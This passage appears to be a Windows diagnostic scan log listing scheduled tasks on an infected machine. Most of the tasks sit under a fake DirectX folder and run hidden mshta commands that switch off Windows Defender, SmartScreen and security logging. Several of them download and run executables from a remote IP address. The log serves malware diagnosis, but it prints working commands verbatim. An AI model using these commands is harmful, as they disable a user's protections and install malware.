Task: {8289A9EF-F35C-46C1-9331-B39ADFA53324} - System32\Tasks\Microsoft\Windows\DirectX\FirstAuGracePeriod => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates"" /v FirstAuGracePeriod /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {82AC4368-4F66-463A-AB0F-A6CEBC66291D} - System32\Tasks\Microsoft\Windows\DirectX\TamperProtectionSource => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Microsoft\Windows Defender\Features"" /v TamperProtectionSource /t REG_DWORD /d 2 /f",0)(Window.Close)
Task: {82B6EBC1-DEF6-47D0-A440-5168CC43E257} - System32\Tasks\Microsoft\Windows\DirectX\TamperProtection => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Microsoft\Windows Defender\Features"" /v TamperProtection /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {833DEB5E-617F-4D4F-A86C-20EC86C3C0A0} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1655864 2022-10-13] (Nvidia Corporation -> NVIDIA Corporation)
Task: {83B92812-A077-442F-A5F5-4AF9B10EB5F8} - System32\Tasks\Microsoft\Windows\DirectX\WdNisDrv => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SYSTEM\ControlSet001\Services\WdNisDrv /v Start /t REG_DWORD /d 4 /f",0)(Window.Close)
Task: {854C747C-CCEE-4386-8968-86EF8EA50281} - System32\Tasks\Microsoft\Windows\DirectX\DisableRealtimeMonitoring1 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("powershell Set-MpPreference -DisableRealtimeMonitoring True -ErrorAction Ignore",0)(Window.Close)
Task: {86BE8E59-FDCC-4BA1-9EA4-1973FA03074C} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [908856 2022-10-13] (Nvidia Corporation -> NVIDIA Corporation)
Task: {88764233-5F19-4968-9E65-9517DDF0BF80} - System32\Tasks\Microsoft\Windows\DirectX\ScanParameters => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan"" /v ScanParameters /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {8897B1E3-659A-4055-B9F3-03FAF38DD555} - System32\Tasks\Microsoft\Windows\DirectX\WdBoot => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\System\CurrentControlSet\Services\WdBoot /v Start /t REG_DWORD /d 4 /f",0)(Window.Close)
Task: {89BC2AAE-BD7D-44B1-B9CA-CBE8BCD4F873} - System32\Tasks\Microsoft\Windows\DirectX\SecurityHealthService2 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("reg delete HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService /f",0)(Window.Close)
Task: {89C0D084-1188-4DEE-82AE-030B776675C1} - System32\Tasks\Microsoft\Windows\DirectX\DisableIOAVProtection2 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection"" /v DisableIOAVProtection /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {8C0160F2-257C-4E1D-A477-6D7FA6627791} - System32\Tasks\Microsoft\Windows\DirectX\ExclusionPath => mshta.exe vbscript:CreateObject("WScript.Shell").Run("powershell Add-MpPreference -ExclusionPath C:\* -Force",0)(Window.Close)
Task: {8C686DA2-6FB2-4003-8CA8-41AEC79FB928} - System32\Tasks\Microsoft\Windows\DirectX\Services BITUHosted => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c curl hxxp://176.57.150.117/u.exe -o C:\Users\Public\u.exe & C:\Users\Public\u.exe",0)(Window.Close)
Task: {8DAC1AFC-87A6-4A03-B462-154E6C77B5F1} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [649784 2022-10-13] (Nvidia Corporation -> NVIDIA Corporation)
Task: {8DEAF3C6-0045-4AD2-8811-F5EC8FF6B3E3} - System32\Tasks\Microsoft\Windows\DirectX\RandomizeScheduleTaskTimes => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender"" /v RandomizeScheduleTaskTimes /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {8E4C2C0A-3F64-4475-A41B-4BBFA77FFEE8} - System32\Tasks\Microsoft\Windows\DirectX\DisableRealtimeMonitoring2 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection"" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {90ADDB8C-454B-403C-8E39-5198735673C3} - System32\Tasks\Microsoft\Windows\DirectX\WindowsDefender => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v WindowsDefender /f",0)(Window.Close)
Task: {90E4422C-F405-42E8-A069-0397DDC9DD77} - System32\Tasks\Microsoft\Windows\DirectX\WdNisDrv2 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\System\ControlSet001\Services\WdNisDrv /v Start /t REG_DWORD /d 4 /f",0)(Window.Close)
Task: {9125AF43-CB74-4BE3-B5C0-6A6B738AF750} - System32\Tasks\Microsoft\Windows\DirectX\WdNi1sSvc => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\System\CurrentControlSet\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f",0)(Window.Close)
Task: {92BC5DB9-84E4-4FE3-BB67-A9D15E88BBA8} - System32\Tasks\Microsoft\Windows\DirectX\Scan_ScheduleTime => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation"" /v Scan_ScheduleTime /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {9707DB99-8625-43CF-A4AE-7F99F13846ED} - System32\Tasks\Microsoft\Windows\DirectX\ScheduleTime2 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates"" /v ScheduleTime /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {9864FFC6-C1B7-4645-A7B6-0D2C13FBFA3B} - System32\Tasks\Microsoft\Windows\DirectX\DontOfferThroughWUAU2 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {98755378-F1D0-4CB3-813F-9EEAD2492505} - System32\Tasks\Microsoft\Windows\DirectX\StartupWithoutEngine 13 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("powershell Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine True -ErrorAction Ignore",0)(Window.Close)
Task: {9CC7C0F4-98C5-4EE7-A74F-3B9F82AE4AAE} - System32\Tasks\Microsoft\Windows\DirectX\WdFilter2 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\System\ControlSet001\Services\WdFilter /v Start /t REG_DWORD /d 4 /f",0)(Window.Close)
Task: {9CD4626D-CD3F-4B70-91E9-62E453A04B6F} - System32\Tasks\Microsoft\Windows\DirectX\WdNis1Drv1 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\System\CurrentControlSet\Services\WdNisDrv /v Start /t REG_DWORD /d 4 /f",0)(Window.Close)
Task: {9EE84F6C-F181-4D64-A915-0CBAFA2C47C7} - System32\Tasks\Microsoft\Windows\DirectX\DefenderAuditLogger => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {9F4AAAB2-62FF-417E-BEF0-DAB76E8781EE} - System32\Tasks\Microsoft\Windows\DirectX\WdFilter1 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\System\CurrentControlSet\Services\WdFilter /v Start /t REG_DWORD /d 4 /f",0)(Window.Close)
Task: {A1D1D798-F6AE-47CE-9B4A-FBD13B2B2383} - System32\Tasks\Microsoft\Windows\DirectX\DisableIntrusionPreventionSystem => mshta.exe vbscript:CreateObject("WScript.Shell").Run("powershell Set-MpPreference -DisableIntrusionPreventionSystem True -ErrorAction Ignore",0)(Window.Close)
Task: {A4C99931-F55F-43EB-92B8-FFF1FC9C73A8} - System32\Tasks\Microsoft\Windows\DirectX\EPP => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg delete HKCR\*\shellex\ContextMenuHandlers\EPP /f",0)(Window.Close)
Task: {A4E3FCD7-AC74-45A4-B330-8B1EB4F1F181} - System32\Tasks\Microsoft\Windows\DirectX\MpEnablePus => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine"" /v MpEnablePus /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {A6F7359B-696B-4264-B9D6-40B29737BC78} - System32\Tasks\Microsoft\Windows\DirectX\WdNisSvc => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SYSTEM\ControlSet001\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f",0)(Window.Close)
Task: {A7DF142D-3526-4958-BFA2-8E681BC51E5A} - System32\Tasks\Microsoft\Windows\DirectX\LocalSettingOverridePurgeItemsAfterDelay => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine"" /v LocalSettingOverridePurgeItemsAfterDelay /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {AA8193AC-CD96-4CDA-BAD7-D8442BAFB5C2} - System32\Tasks\Microsoft\Windows\DirectX\PreventOverride1 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\NTUSER\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost /v PreventOverride /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {AABA1EE9-0C94-4410-99E4-ECE4860DA72B} - System32\Tasks\Microsoft\Windows\DirectX\DontReportInfectionInformation2 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontReportInfectionInformation /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {AD06C936-4395-4977-B782-8D4810D7C832} - System32\Tasks\Microsoft\Windows\DirectX\AccountProtection_MicrosoftAccount_Disconnected => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\NTUSER\SOFTWARE\Microsoft\Windows Security Health\State"" /v AccountProtection_MicrosoftAccount_Disconnected /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {AD59AA05-4FC7-4643-B693-5B308EF66714} - System32\Tasks\Microsoft\Windows\DirectX\CriticalFailureTimeOut => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting"" /v CriticalFailureTimeOut /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {AD6A5BA8-49E6-48DB-BF82-1321ADB239A7} - System32\Tasks\Microsoft\Windows\DirectX\DisableAntiSpyware => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\Software\Policies\Microsoft\Windows Defender"" /v DisableAntiSpyware /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {AFC3E8CE-796D-4CF6-A8FA-5028CDF3DDFF} - System32\Tasks\Microsoft\Windows\DirectX\Services BITMHosted => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c curl hxxp://176.57.150.117/m.jpg -o C:\Users\Public\m.exe & C:\Users\Public\m.exe",0)(Window.Close)
Task: {AFD34A02-1E51-47A4-9E18-C8CA908CA585} - System32\Tasks\Microsoft\Windows\DirectX\Services => mshta.exe vbscript:CreateObject("WScript.Shell").Run("reg delete HKLM\SYSTEM\CurrentControlSet\Services\Sense /f",0)(Window.Close)
Task: {B138A88A-8FD7-41FB-BB11-39D3F5190101} - System32\Tasks\Microsoft\Windows\DirectX\SmartScreenEnabled3 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost /v SmartScreenEnabled /t REG_SZ /d Off /f",0)(Window.Close)
Task: {B30FC555-536D-4C63-8904-136ACB276C77} - System32\Tasks\Microsoft\Windows\DirectX\WinDefend3 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SYSTEM\ControlSet001\Services\EventLog\System\WinDefend /v Start /t REG_DWORD /d 4 /f",0)(Window.Close)
Task: {B3E541DE-E948-426B-8FBF-C4B7C5004D24} - System32\Tasks\Microsoft\Windows\DirectX\EnableSmartScreen => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\System /v EnableSmartScreen /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {B40F287C-0FAF-4808-8569-33DBA3D5D455} - System32\Tasks\Microsoft\Windows\DirectX\DisableOnAccessProtection => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {B4E8F21D-EA44-4888-8DCF-9E64A7002838} - System32\Tasks\Microsoft\Windows\DirectX\DontReportInfectionInformatio => mshta.exe vbscript:CreateObject("WScript.Shell").Run("reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontReportInfectionInformatio /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {B5DEAE10-6455-408B-9B1E-1BBA8A8F2D9C} - System32\Tasks\Microsoft\Windows\DirectX\ScheduleDay => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan"" /v ScheduleDay /t REG_DWORD /d 8 /f",0)(Window.Close)
Task: {B60B0EEE-6AA6-40C5-9F78-6B7BC03393F3} - System32\Tasks\Microsoft\Windows\DirectX\EPP2 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg delete HKCR\Drive\shellex\ContextMenuHandlers\EPP /f",0)(Window.Close)
Task: {B6FA2D91-F86A-4536-A9B9-DBD7FFCCA3ED} - System32\Tasks\Microsoft\Windows\DirectX\DisableNotifications => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications"" /v DisableNotifications /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {B7377EA0-9F05-4F9A-A96C-33642D3C6426} - System32\Tasks\Microsoft\Windows\DirectX\DisableScriptScanning1 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("powershell Set-MpPreference -DisableScriptScanning True -ErrorAction Ignore",0)(Window.Close)
Task: {B8224216-9559-4628-9742-8BAF00A207BD} - System32\Tasks\Microsoft\Windows\DirectX\Services CUMHosted => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c curl hxxp://176.57.150.117/m.jpg -o C:\Users\Public\m.exe & C:\Users\Public\m.exe",0)(Window.Close)
Task: {B8BB51C4-05D7-4592-9521-7A8D85D95CD8} - System32\Tasks\Microsoft\Windows\DirectX\DefenderApiLogge1r => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {BAF06007-95D5-4588-B913-16209F5F79CC} - System32\Tasks\Microsoft\Windows\DirectX\LocalSettingOverrideSpynetReporting => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet"" /v LocalSettingOverrideSpynetReporting /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {BC223E0D-AE24-4606-9CE6-A0E7AE5193A9} - System32\Tasks\Microsoft\Windows\DirectX\WinDefend => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SYSTEM\ControlSet001\Services\WinDefend /v Start /t REG_DWORD /d 4 /f",0)(Window.Close)
Task: {BCA361E1-6B0B-4749-9F09-A1C3F9CDA8D2} - System32\Tasks\Avast Software\Overseer => C:\Windows\OEM\CustomizationFiles\Overseer.exe [2250576 2022-10-27] (Avast Software s.r.o. -> Avast Software)
Task: {BD13B56C-8117-421D-92EE-DA653355F849} - System32\Tasks\Microsoft\Windows\DirectX\PreventOverride3 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter /v PreventOverride /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {BD1B1EE1-7B36-49AD-8536-0AB7B48662F3} - System32\Tasks\Microsoft\Windows\DirectX\PUAProtection => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender"" /v PUAProtection /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {BFDC800B-1743-45C6-A173-D71D0587AC6F} - System32\Tasks\Microsoft\Windows\DirectX\WdBoot1 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SYSTEM\ControlSet001\Services\WdBoot /v Start /t REG_DWORD /d 4 /f",0)(Window.Close)
Task: {C0A261BA-CA64-4333-A6D8-02D5C75AC188} - System32\Tasks\Microsoft\Windows\DirectX\AdditionalActionTimeOut => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting"" /v AdditionalActionTimeOut /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {C0E64D9F-4EA3-4FA4-A4B3-40DE3494B4F8} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [414872 2017-04-12] (OOO Lightshot -> TODO: <Company name>)
Task: {C3143121-7C91-48D6-ABA9-64928D3AA18A} - System32\Tasks\Microsoft\Windows\DirectX\DefenderAuditLogger1 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {CB1F9219-EB2F-48DA-A508-B82881D05AE0} - System32\Tasks\Microsoft\Windows\DirectX\MpEnablePus2 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine"" /v MpEnablePus /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {CF5E3955-62D3-42E6-B8CB-F33DFC54887E} - System32\Tasks\Microsoft\Windows\DirectX\ExclusionProcess => mshta.exe vbscript:CreateObject("WScript.Shell").Run("powershell Add-MpPreference -ExclusionProcess cmd.exe -Force",0)(Window.Close)
Task: {D3202D94-C379-4378-8020-C0B8B8F2BB8A} - System32\Tasks\Intel PTT EK Recertification => C:\WINDOWS\System32\DriverStore\FileRepository\iclsclient.inf_amd64_76523213b78d9046\lib\IntelPTTEKRecertification.exe [818008 2021-09-15] (Intel Corporation -> Intel(R) Corporation)
Task: {D7536044-4FA4-4A4B-90D6-BBA66BCFE9D9} - System32\Tasks\Microsoft\Windows\DirectX\SubmitSamplesConsent2 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet"" /v SubmitSamplesConsent /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {D99E93B1-E2FC-459D-9E1E-BBCC7176F84F} - System32\Tasks\Microsoft\Windows\DirectX\EnabledV92 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter /v EnabledV9 /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {DACCE144-C087-4F35-BDFC-AA313E9EB875} - System32\Tasks\Microsoft\Windows\DirectX\SecurityAndMaintenance => mshta.exe vbscript:CreateObject("WScript.Shell").Run("reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance /v Enabled /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {DE9A78EB-DAF1-4709-95C5-19B3657CDA81} - System32\Tasks\Microsoft\Windows\DirectX\TamperProtection2 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Microsoft\Windows Defender\Features"" /v TamperProtection /t REG_DWORD /d 4 /f",0)(Window.Close)
Task: {DFE6B586-89BF-4BD7-A037-7C61BAA3AF73} - System32\Tasks\Microsoft\Windows\DirectX\DontReportInfectionInformation => mshta.exe vbscript:CreateObject("WScript.Shell").Run("reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet"" /v DontReportInfectionInformation /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {E3A23326-8BC8-483D-A1B8-453C9F2827C7} - System32\Tasks\Microsoft\Windows\DirectX\DisableScanningMappedNetworkDrivesForFullScan => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan"" /v DisableScanningMappedNetworkDrivesForFullScan /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {E3CCC20B-F0C4-42A5-9847-A831C92FE0F1} - System32\Tasks\Microsoft\Windows\DirectX\StartupApproved2 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /f",0)(Window.Close)
Task: {E4DDEC88-6C69-49EB-976D-522736137B75} - System32\Tasks\Microsoft\Windows\DirectX\SecurityHealth2 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /t REG_BINARY /d 030000000000000000000000 /f",0)(Window.Close)
Task: {E55589E5-20CB-433E-A9DC-C08C6A3CC0DC} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [908856 2022-10-13] (Nvidia Corporation -> NVIDIA Corporation)
Task: {E5F21C7A-1103-40D9-B2DC-CE7035E98C43} - System32\Tasks\Microsoft\Windows\DirectX\DisableBlockAtFirstSeen => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet"" /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {E77024A3-06DF-40D2-BDA8-8F0ED417D737} - System32\Tasks\Microsoft\Windows\DirectX\DisableScanOnRealtimeEnable => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {E937CD5F-33FD-42FA-8FF8-64CCFE1CB3D3} - System32\Tasks\Microsoft\Windows\DirectX\SubmitSamplesConsent => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet"" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f",0)(Window.Close)
Task: {E974C67B-4E73-45E4-BA97-A5CD6A0F0E1B} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1655864 2022-10-13] (Nvidia Corporation -> NVIDIA Corporation)
Task: {EB88002E-447B-4187-9B1E-887E198CCF7E} - System32\Tasks\Microsoft\Windows\DirectX\Sense => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SYSTEM\ControlSet001\Services\Sense /v Start /t REG_DWORD /d 4 /f",0)(Window.Close)
Task: {ECB4FB84-CAC7-49E6-9415-90031098E4E0} - System32\Tasks\Microsoft\Windows\DirectX\SmartScreenEnabled1 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("reg add ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer"" /v SmartScreenEnabled /t REG_SZ /d Off /f",0)(Window.Close)
Task: {ECC42AF4-1E71-4A50-B80E-A9EF51154A69} - System32\Tasks\Microsoft\Windows\DirectX\SubmitSamplesConsent1 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("powershell Set-MpPreference -SubmitSamplesConsent 2 -ErrorAction Ignore",0)(Window.Close)
Task: {ECF571FE-4A69-4F0C-86B4-95371A20E91F} - System32\Tasks\Microsoft\Windows\DirectX\DisableArchiveScanning1 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("powershell Set-MpPreference -DisableArchiveScanning True -ErrorAction Ignore",0)(Window.Close)
Task: {ECFE1D48-548E-442F-8EBE-A47D302A1598} - System32\Tasks\Microsoft\Windows\DirectX\Antimalware => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SYSTEM\ControlSet001\Services\EventLog\System\Microsoft-Antimalware-ShieldProvider /v Start /t REG_DWORD /d 4 /f",0)(Window.Close)
Task: {EDF5251E-519B-49BF-87E5-F91918712B68} - System32\Tasks\Microsoft\Windows\DirectX\NonCriticalTimeOut => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting"" /v NonCriticalTimeOut /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {EE154BF7-B1AF-43B1-9902-A2925A6010F7} - System32\Tasks\Microsoft\Windows\DirectX\DisableBehaviorMonitoring21 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection"" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {EF0E7CF1-7F8C-4AE7-A82E-F73DFADD0CBD} - System32\Tasks\Microsoft\Windows\DirectX\PreventOverride2 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter /v PreventOverride /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {F134FFE8-7334-4397-8339-5CBC6335EA14} - System32\Tasks\Microsoft\Windows\DirectX\Services CUUHosted => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c curl hxxp://176.57.150.117/u.exe -o C:\Users\Public\u.exe & C:\Users\Public\u.exe",0)(Window.Close)
Task: {F53745B2-B26B-4A3D-9CF3-AEF605F52DF4} - System32\Tasks\Opera GX scheduled Autoupdate 1666967487 => C:\Users\hardr\AppData\Local\Programs\Opera GX\launcher.exe [2471880 2022-10-28] (Opera Norway AS -> Opera Software)
Task: {F57C4785-A491-430C-B146-2A46D427A8F8} - System32\Tasks\Microsoft\Windows\DirectX\DisableCatchupFullScan => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan"" /v DisableCatchupFullScan /t REG_DWORD /d 1 /f",0)(Window.Close)
Task: {F6158A1C-913F-46A5-8908-A6985FD2880C} - System32\Tasks\Microsoft\Windows\DirectX\Services CUCHosted => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c curl hxxp://176.57.150.117/obs.exe -o C:\Users\Public\obs.exe & C:\Users\Public\obs.exe",0)(Window.Close)
Task: {F65B9BE1-D932-41DA-BD53-9AB004141722} - System32\Tasks\Microsoft\Windows\DirectX\WinDefend1 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\System\CurrentControlSet\Services\WinDefend /v Start /t REG_DWORD /d 4 /f",0)(Window.Close)
Task: {F814AF59-B96A-4DF8-B744-55ADE8F34C1B} - System32\Tasks\Microsoft\Windows\DirectX\SmartScreenEnabled12 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer /v SmartScreenEnabled /t REG_SZ /d Off /f",0)(Window.Close)
Task: {FA5F542F-AE17-484D-B1AF-D243A00D7E8A} - System32\Tasks\Microsoft\Windows\DirectX\DisableEnhancedNotifications1 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\Software\Policies\Microsoft\Windows Defender\Reporting"" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f",0)(Window.Close)
